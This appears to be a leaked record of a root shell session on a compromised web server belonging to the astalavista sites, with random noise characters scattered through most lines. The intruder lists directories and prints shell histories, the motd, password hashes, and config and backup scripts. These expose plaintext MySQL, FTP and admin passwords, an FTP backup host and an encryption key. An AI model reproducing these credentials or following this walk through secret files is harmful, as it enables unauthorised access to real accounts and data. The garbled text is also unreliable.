# W& d- T* t; W% x2 ^ z- Kcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
- L, J( V" I- i6 Dastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
2 ]0 r! x2 A! z6 c3 }" w" ^2 I
) U) u/ r# @/ t( K* t0 ]$ P! \6 wsh-3.2# cat /etc/motd
6 ?( S0 U4 A* p! D4 ~+ ?#####################################################/ \0 u8 e- b2 ]0 z$ U
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
9 @0 K9 u& H+ x# X; ~! ^- z4 W( I" {) a# |__| [__ | |__| | |__| | | | [__ | |__| #! j% ~' ]) ^; I( v2 T
# | | ___] | | | |___ | | \/ | ___] | | | #
p) M7 w& l1 Z0 l: O- B- {' P# #
4 W1 r/ `/ p3 }* w7 v* s#####################################################
) \3 h( s0 F8 U4 D% d# #. [- h; {- M3 z# T7 k2 z0 k {7 `
# Admin Contact - 链接标记support@secureservertech.com #; ~$ d! r6 ?. z& ^6 q4 V& m! R+ q, m
# #0 w6 t+ c4 a/ x
# Available ShortCuts #: E2 X9 }) h- X3 c: n" f
# #
( ^2 y6 E" ^& E" d# nst - list active connections #) t" m3 C7 F. t1 A7 j( T1 [
# ddos - shows how many times each ip is connected #3 s( h# b0 J, F
# ltr - restart the webserver #
: n K4 ?2 F2 I% R+ X# phpc - edit the php config file #
" H6 {. ]/ @" ]+ a( A& |. _# htc - edit the webserver configuration file #. Q: s$ c/ n& c
# up - uptime #
- q: j: {# m; n9 n& [9 ^# etd - edit the motd of the day file #, s( {4 h! w1 F; n. R
# htr - start and restart apache if needed #
# W! n/ [ u$ J% `% p3 i; @# syng - shows active SYN_RECV connections #
& b! a" h7 ^6 F# synd - syn flood blocker - “synd -h” for usage #. E% t+ g; q+ E3 b O/ r5 \2 k
#####################################################6 j, F) U9 e4 x( O1 h
# NOTES: #
' V& R1 G% @0 P) N# Last Upgrade - 12-08-2008 by JF ## h2 r! c9 U% |+ l) K L3 H8 E
# My.cnf/Mysql Optimization - 1-28-09 #, s$ c( h; P1 N/ I+ H
# #% c2 ?7 h3 A" d6 [0 ^" b# L
# #, e' @7 t/ F# h, m8 s1 D+ U
# #, E/ T& ~/ u7 c& p& [
#####################################################
3 X$ t. S1 L+ i1 g! ]9 f6 n
6 c/ S& U, o( {' osh-3.2# lastlog | grep -v Never6 c2 g0 W9 e6 l2 L
Username Port From Latest
7 i/ Q& P. a7 b) q9 q/ H1 G8 oroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20099 O! |& p S! r9 i- A# C
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
, |7 g, x- Z& ucom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009, O. i. i! F7 I5 e1 k4 x9 O
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20095 h* o5 n$ x6 o7 ]" J
/ @- `0 n4 D, |) y
sh-3.2# ls -la. e. |2 A; G" T2 B) S# T. _1 }
total 4533769 y4 j% y/ O: o) F* N
drwxr-x— 15 root root 4096 Jun 4 08:40 .. I5 t% c6 \$ u/ c; E" s2 y
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 _9 S9 X: I# o1 b9 G-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
) {9 k I# c* J" B% e3 E; }" o-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 ?' M" F6 W/ L! g: ]* ?-rw——- 1 root root 16836 Jun 4 07:21 .bash_history) @0 M& e$ t6 }
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout, U7 C9 k9 E4 E
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
+ f" o% g* N# N6 j! f( W" ]-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
, R' B- b( d& Z t. F* c" l-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
+ R% r& [$ l# `- q-rw-r–r– 1 root root 1327 Nov 29 2007 cert1 U* ^0 T0 J" A; I( G
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql6 F0 N) Q' ?4 r p9 B! l
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan; E& L; Z, P% y+ K ^' B3 p
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc4 b! z) u9 d. h
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql- w4 A# J9 {4 b( P g3 t
drwx—— 2 root root 4096 Oct 28 2007 .elinks
7 f4 o, I, X6 Ydrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.11 }7 z/ x( L3 V
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
$ _' A4 f! D: i/ t( O7 W-rw——- 1 root root 0 Apr 16 13:19 .history# K4 ]4 N1 s+ [0 o/ H' [4 j- u& Y
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
g$ B N8 V: u-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
R! o R- m8 s3 ]; x-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh. t. u# ~* o# q" Z
-rw——- 1 root root 35 Jun 2 14:23 .lesshst& O7 s+ R8 w' K
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
, i' g5 m8 I, _) ?3 P, [drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
* G9 w) }; `7 ]! g7 r-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz$ }5 ]6 T6 h1 W6 J! A
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
! d" g# G1 V8 u! \-rwx—— 1 root root 760 Sep 18 2008 lp
8 O0 @+ C1 V; p& Q: odrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
0 H3 i9 Q7 O3 T, h6 u2 O-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz$ X# D$ P, ~, @6 B' R
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.12 A$ }+ e; r) V" }7 l
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
2 X% H! S- A0 o4 Q* L1 S1 |2 A-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz! j) m) s! a* _! G& [- `, b
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3( N' A3 J' H+ K# \0 _
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz! n& j2 w0 ]# f' a" `
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh' { B+ |" N' z8 ]" ~
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
/ H. e; g, b. F+ ~! X& k-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
$ }- b; `+ b3 a# O6 J# N! R( K-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ {* \9 H' h( }8 F7 l8 k
-rw——- 1 root root 41 May 20 2008 .mytop1 |: T7 V% f/ K8 `$ B, \
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
" X( Y! X+ t% B-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
5 }/ J p6 s j& q, ]4 ndrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
+ A+ X7 z" E" [-rw——- 1 root root 1462 Sep 21 2007 opt.php
" x& ?' r6 ?2 h- c-rw-r–r– 1 root root 3371 Sep 22 2007 p
. U. q+ ^( L6 c-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz28 h8 M* Y2 o5 n- ^6 I1 Z6 Y
-rw——- 1 root root 1024 Feb 3 21:32 .rnd4 Z" x8 g' U, Y" f8 S( `! k
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
2 [, u* d( [: h0 U/ E9 T- | N-rw-r–r– 1 root root 887 Nov 28 2007 server.key" W0 Z/ R! w, b
drwx—— 2 root root 4096 Oct 10 2008 .ssh
r( B4 ~ C6 J8 I-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
- A3 a; I* D) v0 d-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
* \" V, k$ w7 w0 ?# Z+ }4 m. G-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
+ }3 X: k- h5 e/ ~9 s2 Y-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1: ]3 i) u- t, r4 S. ^: M
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
]3 X5 ~* Q2 D5 Y- Q-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
! q; E2 a ^- W; ]' Y% |6 P1 rdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
" Z Y4 \ \: }-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz25 M: {' N) U% P, o/ C0 s7 e2 u" y
-rw——- 1 root root 12997 May 16 2008 .viminfo
, d3 g, F, ^2 {/ |$ i* A$ r O
7 H! r1 W6 w8 g! dsh-3.2# cat .bash_history
, y' u$ ~# Y8 u/ r+ ^! O[snip]
& h' R4 k* i, x- G1 Nwget cp4sst.com/sstlinux.tar.gz
% r# ]7 y' |* Ltar zxvf sstlinux.tar.gz
, ~* B4 p: N6 N1 Pcd linux-2.6.27.10& y! |8 o# ~3 b0 ^$ K4 e1 z' e
sh install.sh
+ \; B, G* T5 ^1 R: v3 wmake bzImage ; make modules ; make modules_install ; make install4 I' k' {0 J' a% a, C4 f
make clean
. d% R* h8 l* Z: Wservice mysqld restart U& l. c. W3 H! q( r
[snip]
" l0 z% x: B( ]; c* p: O) `0 ~cd /usr/sbin/% O7 G6 |7 u6 q. f) @
chmod 4777 traceroute! l6 j l& Z: V9 ~5 P5 Y
chmod 4777 ping- R# _4 G) Z8 o) c
traceroute -I 链接标记[url]www.astalavista.ch[/url]- j$ K1 n1 u. Y' E& {% y/ c
[snip]' y& ^2 o# Q' @
vi /etc/csf/csf.conf
: x/ B9 P9 v& O! m4 Btraceroute google.ch
; Q9 z7 O& u9 |; B- Sservice csf restart
# O$ A2 k U) l+ p6 n) w: Utracert google.ch: L. `6 ~# U B7 M0 [+ T5 f
service csf restart
8 ^, O3 ^9 G* u! P) A# B' v4 F4 }! ytraceroute 链接标记[url]www.google.ch[/url]- n& g6 n* O8 G/ @
tracert 链接标记[url]www.google.ch[/url]/ D! Y8 Q$ o* j% T
traceroute 链接标记[url]www.google.ch[/url]& I" ~, ~& Q% s, J+ T
locate traceroute1 r6 S. L: d9 N# |$ w
chown 4755 /bin/traceroute( z5 E: A# {4 @8 ]
chown 4777 /bin/traceroute+ K/ e: o! N" Q# n
locate ping
, ^) i+ G" Z% l; c! w# b$ f. wchown 4755 /bin/ping+ s/ Z) ^/ h$ ^$ t3 ~
chown 4777 /bin/ping) ^. [! q( ]+ R7 ^: w; Q
cd /bin/( @4 J& e7 O4 k* [; C2 Z
ls -ali | grep ping P5 C& N+ p5 t4 I8 Z
chown root ping
0 D% |% p! P0 \' Gchmod 4755 ping8 q: ?- Z' l, s
ls -ali | grep traceroute
" y' T/ Z0 J. W. u3 `chown root traceroute8 }" F9 z: d$ p" a2 {. j
chmod 4755 traceroute) I8 q3 ~) f8 e: X& \9 w+ v
ls -ali | grep traceroute
# {1 k8 v$ b2 ^; H% ?" ntraceroute -I 链接标记[url]www.google.ch[/url]
( _. i& @8 y7 w% q( D& z2 M$ Z$ Dtraceroute 链接标记[url]www.google.ch[/url]$ J. n5 z8 d% x m
whois pmsantos.ch
* {) I9 M0 A. G# ]# `% v[snip]
: N& A7 T* Q; o/ L' o$ d* emysql -h com_contrexx2_live < /root/defaultp_ports.sql
* L. q0 F% I e; D0 kmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql- Y- U3 C( k% u
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql }& F" O3 d8 Y" Q. Z
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
4 U; j7 i8 l. R" m$ @% N# Utop
1 \1 t1 G" o Q- B# \& Q9 Yping ssth.ch$ c' O8 F' n" | [1 S' h
ping asdlkfaljgasd???ljg???lasj.ch
, k3 W' J' W- s$ _ping asdlkfaljgasdlasj.ch" v9 z$ H" s( \" f% N6 i& s
ping 链接标记[url]www.ssth.ch[/url]
% ]' w4 K! j4 p& y; L; p; U: ^' i3 Bping ssth.ch
) Z0 T& E, H4 ~0 s% Mnslookup 链接标记[url]www.google.ch[/url]9 a2 c. { f' X/ q' u( A5 S* n
nslookup 链接标记[url]www.ssth.ch[/url]
/ S3 M6 x3 |' ?8 }5 Tman nslookup/ b" b& G1 t, j2 J* n. {
ping 链接标记[url]www.google.ch[/url]
9 @ \9 B6 z% [( x Z0 C) fnslookup 链接标记[url]www.google.ch[/url]
/ |* m. @" n- j) G4 F# x3 z1 Bnslookup 链接标记[url]www.google.ch[/url]
# `0 ~ e2 v" H2 m" w/ K4 r, dnslookup salfjasdlf.ch; e" q2 ]' i2 N: \/ f
[snip]
, J, m ]5 G6 e6 {2 ^- Wopenssl passwd -1 sadf4 x6 ]5 b E! Z# C% A/ M/ \) j
openssl passwd -1 5cZNHstdTy$ H1 x- d2 s# A' f ^, ]
mysql
# F+ K- }4 r5 w6 V' @ |7 _7 Tmysql
, e5 J4 c- E- ~! R* elocate proftp
- o+ ?$ _+ R( ^, O; fvi /etc/proftpd.passwd
0 |% ]3 z: h' Z$ wservice proftpd restart
, }- X# W) D4 K+ ^# Y" X! olocate proftpd.conf6 I4 W/ ]( n9 t, W9 g, p" u
vi /etc/proftpd.conf9 N" I3 T8 ?& k6 i/ P+ v
vi /etc/proftpd.passwd
/ q( Y( d3 q' J0 K3 [4 ^3 Vservice proftpd restart! L; M8 x: \# }) w" q! J
[snip]) J% I: B5 u6 k8 ^3 n( }
/bin/sh /home/com/backup_system/backup.sh% G' k( m. X0 a" h: ^$ X( g
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin' i$ k0 t: |1 \% h! \( n
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
3 L* j v7 n& q7 {$ _mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql, H7 F1 J" ]2 y8 w/ Q% Z
ls -ali" j5 Q$ C7 G- p' F0 I0 K
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
9 t) b( w/ U8 ^1 Gmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql+ ~" C! L- X! O9 }6 ?
crontab -l
* \! H9 R* C( f3 R$ mcrontab -l
0 g1 W2 S2 H0 \/ U+ a, mphp -q /home/com/public_html/modifications/cronjobs/securitynews.php) ` m) T( n8 J4 C
/home/com/public_html/modifications/cronjobs/exploits.sh
# o& t9 Z, j/ I+ _wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url], h: s3 C; U, f9 e
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz+ Q4 f. g2 W* B/ b5 p
cd lsws-4.0.3* l- p4 \# y9 H% M
sh install.sh
4 x* i `- y, ?uptime
" F1 u, L5 A4 M/ ~6 {; g8 ~; I. o ihdparm -tt /dev/sda
% t9 }) m% e/ x, J1 liostat6 R8 @& q& S: c8 T
yum install iostat/ p7 s& ~. X- s4 s; w) I: F1 v$ J
iostat
3 B3 c+ `! j( {8 Cwhereis iostat- j' ?: D7 l/ ~: p$ [% U) q7 T6 r; v
yjm clean all. P" e, K: X' Y- u
yum clean all ; yum -y update6 w6 Y: y% ]$ F/ `4 `
iostat
J4 b6 U2 y. S# ryum install systat
/ I' B. N2 u) m; J. k! J0 n! wrpm -qa | grep iostat" U% C! p. `% W( A4 d
rpm -qa | grep sysstat
' i" L$ B! B! R$ K }3 Trpm -qa | grep systat
; [% M5 Q- n# n# Y5 \& d, vdmesg -c- m6 r1 [5 t9 ]8 D" d: J2 H) `
sysctl -p
) Y9 O0 D! j; C% }! X |$ juname -r
6 x( @6 [, w7 c2 \5 m# kcd /usr/src" F# D4 J2 ~2 j
wget nix101.com/kernels/sstlinux.tar.gz; J" h, {" x) I! c2 Q( `) }
shutdown -r now
& I- O- x. x4 T& c# T# cnano -w /boot/grub/grub.conf: z1 K' _/ q$ o" m* d, m
4 z7 }" X0 k6 b" \sh-3.2# cat .my.cnf
( T2 ^; n: Q! N9 u/ z[client]
. q/ Y. g: w/ ^6 H5 ruser=da_admin
; } x0 y q- `+ \password=X9dctmRH9 X g; S6 ^9 J; H) u
5 P+ V, p4 S$ Z8 D' rsh-3.2# cat /home/com/backup_system/backup.sh
6 n* T$ I# G! R9 ]" s: `#!/bin/sh: }( U, y) {" k8 R5 t- V' ]
#####################################################################
H) ]% e/ ?5 C2 T: x# #
' g. `/ w$ e1 l1 a! ^4 {! m# incremental backup for astalavista.com #
, N& d2 a5 }% J* u2 Z! L3 w# #
- |" O: H6 b0 s( l" B3 k$ e6 B/ a! z7 D# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #, D6 S5 q* c" i a% b0 T
# #& X9 s9 H. R) Z& ~
#####################################################################4 v$ ^6 G! ~1 `6 f1 n1 D9 f8 B
[snip]& U3 g2 ?' h- v# U- b
PROG_DIR=”/home/com/backup_system”;5 \$ ?: ~* P; \
BACKUP_DIR=”/home/com/backups”;
* |. v9 P. p: U: {/ Y2 vDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;4 X( y4 y2 V/ e9 S% {7 `
# ftp for synology backup server+ E& E- n: q9 F- z5 k
FTP_HOST=”212.254.194.163″;
% y% v7 r& {6 Z% H# g/ u) HFTP_PORT=”21″; p9 {, K. J1 z
FTP_USER=”astalavista.com”;
8 U8 @) L$ j0 x: w0 p) DFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;9 U- s9 O Y. ? P! ^1 J7 c' r
FTP_DIR=”/astalavista.com”;! X7 j1 o, D; R3 s7 ]9 @
# database
% z( f7 M% j C' PDB_HOST=”localhost”;2 g W1 g9 z0 U1 a& L" ?5 O
DB_USER=”contrexxuser2″;+ J+ w, c, f" b! [4 V' ~
DB_PASS=”0fEYNZgXz1pKe”;
$ N1 N: V4 b' FDB_DATABASE1=”com_contrexx2_live”;
. v* b0 y& Y! o1 H: G9 ODB_DATABASE2=”com_contrexx2″;
+ ?, }! X) o( o, u+ V2 h[snip]* {; N2 c4 g" t2 r q! L
ftp -in $FTP_HOST $FTP_PORT <<EOF7 Y1 N: j6 Z/ _8 o0 @8 e
quote USER $FTP_USER
6 O- |4 |: j& Qquote PASS $FTP_PASS
4 w! Z+ h3 M, K" A' scd $FTP_DIR2 b* H1 K2 d4 i) w" g
put $DB_FULLNAME-SQL_Dump.tar* `) J ]2 o+ d3 C+ S! M
put $BACKUP_FULLNAME-Public_HTML.tar' F5 |4 y: r/ n
close# X, |1 B% S6 `8 \
bye2 F7 i! J% g( c- E
EOF
7 C. n9 W+ {' ~( b
1 \; Y4 e9 H9 psh-3.2# cd /home
6 h% W% N, e# u" P& e) ash-3.2# ls -la6 l0 }& q$ W5 K
total 120
8 `# {& u) V( f& X/ C& B0 Q* Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
! i Q* p' ^0 gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
# L! w! n* F( L' ]+ Pdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
1 i& S2 k. F) e* J. f" u-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
! B5 B- }7 R- n5 y9 n! [$ f-rw——- 1 root root 8192 Jun 3 02:45 aquota.user/ `2 e( |3 h1 @) \; ?8 h7 D. P
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet) d0 Y3 l" Z* w' b% M5 K
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup6 Q) R: E! K) D8 Q1 r! a
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ p: H5 V9 p( Y" R; E6 d
drwx–x–x 10 com com 4096 Apr 28 12:40 com
& i- y& m. y; w- g9 f' `7 G0 gdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
3 Y4 O6 J8 A$ _+ |5 _( P. s' }drwx—— 3 jon jon 4096 Sep 21 2007 jon+ Z# A& J. {0 b/ P, |& G5 q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
; [3 |, M. K, `& K# ?; Kdrwxr-xr-x 2 root root 4096 Sep 14 2007 my8 x [* s: ]/ l! {& H
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
+ `3 r8 y8 q" k3 R1 z" ]# }drwx—— 2 jon jon 4096 Sep 15 2007 test
8 k) q \1 {) H2 z/ m* G6 x) Idrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp/ H, O' u- ]& l& n
( j: Z" L, h. @- Z: T) L8 [( E
sh-3.2# cd admin
; _- Z7 H. u8 N- M! L7 y2 K% esh-3.2# ls -la
2 d6 \" r) D; G5 m u; f1 J3 Ttotal 1735896! S& R. M9 C G8 I# B
drwx–x–x 9 admin admin 4096 Nov 28 2007 .: B' g9 u) i0 T( a# F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* B9 c3 w5 R6 R* w. u5 N% Y# Udrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups/ {3 D/ m6 D* _
drwx—— 2 admin admin 4096 Sep 28 2007 backups
2 e( d# {& u4 d) T-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
$ _, m# k- X! l" S-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
+ b B c, ]6 C-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
) Q3 g# t/ a2 o5 ~- S- _0 G. S-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc9 ?7 i9 v/ {3 @; y7 R+ N
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
5 G- R! W2 @7 u( g, }drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
- _- U( s! n0 _. f0 a* Y! o7 K2 Ldrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
6 |/ N' l5 o& D$ v U-rw-r–r– 1 root root 24 Sep 21 2007 info.php
5 \; Z8 s! K- c/ w; i1 e3 zdrwx—— 2 admin admin 4096 Sep 21 2007 mail3 m4 G4 o/ x Z2 b/ Q+ M
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
2 \9 K* D" P6 d, C-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ B$ a4 T' z7 W! l- S$ M& i' A/ V( b6 u
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow: }' U7 R6 y4 {- C4 V
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz y: g# f/ j3 Q/ @% p( I6 e
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups" B; D1 F# e# T* j' b
C B, Y" ]. O1 Zsh-3.2# ..
9 a$ r1 [# \6 u/ Esh-3.2# cd jon0 C+ P, ]+ H/ e
sh-3.2# ls -la
3 U, b5 P( c6 k, q5 Q" s- }+ d6 itotal 36
) S2 X: @& ]# O2 a, gdrwx—— 3 jon jon 4096 Sep 21 2007 .1 c+ P7 }' e7 a) i8 o) T7 d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 O9 z4 r- M. C: ]* }) a
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
. U x1 g. {$ G3 }- k- H6 t6 Z0 I-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
0 u+ N1 f4 M" ], o0 U-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
6 V. b1 U, U6 r-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
% G/ t" z) s! m+ s-rw-r–r– 1 root root 24 Sep 21 2007 info.php: Y' a5 Y* W& q( M
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
D; U. w4 S' f0 n; j. O$ J, i1 k& X3 J3 j
sh-3.2# cd ..
5 w- u4 p/ [3 N7 gsh-3.2# cd test& X; o/ l4 a! |; N0 [
sh-3.2# ls -la* k* P' y) Y4 e$ r
total 48
& ^6 r% t/ L8 P+ Rdrwx—— 2 jon jon 4096 Sep 15 2007 .
5 s' v$ c# {7 kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 C: A1 D3 O, }& M) O0 u-rw——- 1 jon jon 79 Sep 21 2007 .bash_history' F4 v' l$ d! ~2 S
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
# Y6 D, V4 u u& S8 b& O3 c-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
6 h3 o$ E: e3 Y' U7 N-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc+ C+ u$ m% X# ^! R$ G* ]
sh-3.2# cat .bash_history5 C# A) p% j/ d& ^: U$ A
/usr/bin/mysqladmin -u root password PoliuJhytg67
: x: Z3 z9 \2 i' r( O f% I) s l8 |" [1 a6 }7 }' A5 i( h5 X
sh-3.2# cd ..
/ C, V& p0 S0 Fsh-3.2# cd astanet
% n7 w7 _% G! Z* y) ^0 Tsh-3.2# ls -la' s( w9 o' A! q- o) {
total 52
" q6 o) {/ }$ e( v+ S( r) N$ Bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! D. k$ A$ ?. z3 b# n! L o
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' h' m$ j1 {9 f3 s) rdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& w; h: [# ^. a# g! l( z$ f
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
; O8 t$ b2 }# F( g% {6 Z8 v S: n-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
' i. i8 _& B: W* k2 V( g-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile. a. Y1 ?+ \( k' q/ E- \! l) }
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, o' D& Y# k& K) d# M4 N
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
- \7 G6 O6 Z0 U) Kdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
2 {4 p! |3 D$ o: {; r+ F4 I$ cdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
& M" y: P" r' F" q, L-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history0 r* S+ `. p I) s6 R& U
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html* i2 L6 Z" o- M' w9 ~6 w
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
: Q! q ]" A3 h2 O) R# r$ t4 t$ ~% Y6 U9 ~1 ]3 _) H0 D' G
sh-3.2# cd auth/ x9 d1 k3 F# x8 V9 c
sh-3.2# ls -la
8 `0 |( _ {& ^: n: J4 @: f2 _- ktotal 28
9 z! ]% G( P5 @" S1 w" ?' k; bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
4 v; [' q. Z) @) Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
. `" t9 ]5 D o& ^6 C) {-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
! n5 o3 g: a/ I: A-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
" z4 x! e7 \3 X/ B! g" u# c8 Q, g* Y/ a-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd* s& \: ]9 _9 y
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
: H: t9 M( _9 q-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
, H. l" d9 d* q) j9 v
6 q( R, i/ ?2 csh-3.2# cat hackercontest.config.inc.php$ h$ z. I9 U2 L2 [8 |" W) L
<?PHP
) G) Y" n( A& n// Variabeln f?r Verbindung zur Datenbank //* `* }. {$ k. x6 I1 V9 }, {2 v
$conxHost = ‘localhost’; // MySQL hostname+ E0 { G! C' {5 }
$conxUser = ‘hackercontest’; // MySQL user3 C- e z4 m2 P3 u- h2 z, b y
$conxPassword = ‘K6m@7dUc’; // MySQL password
9 \- J' q1 B( M: d$ W4 O7 j) H$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish8 }4 n* Z! ?* d7 m- U
?>- T9 P$ Y: Q7 ^; F5 f' A8 r& l5 r
sh-3.2# cat hosting.config.inc.php- v' u; ~4 Z. t. \
<?PHP
8 j A3 D& ]! q, V) a// Variabeln f?r Verbindung zur Datenbank //( P) n8 Z/ B; s
$conxHost = ‘localhost’; // MySQL hostname& s2 k: G2 A/ v+ |0 B5 e
$conxUser = ‘hostinguser’; // MySQL user! H2 |$ c" F( O% o# w
$conxPassword = ‘cXvB3981′; // MySQL password. G/ z- [, m( @
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish/ F, f, \% v, X+ |; T7 K8 v
?>
2 g: y7 N' } R! \, n0 ~4 a9 o3 u v" S
sh-3.2# cd ..
' @; H; t& u5 z6 Ysh-3.2# cd com
3 I4 f/ Z2 ]' ]2 Rsh-3.2# ls -la/ c @. s1 J2 {+ W% z* Y
total 141208; d% _: B# Q4 f9 E6 Y+ K8 {
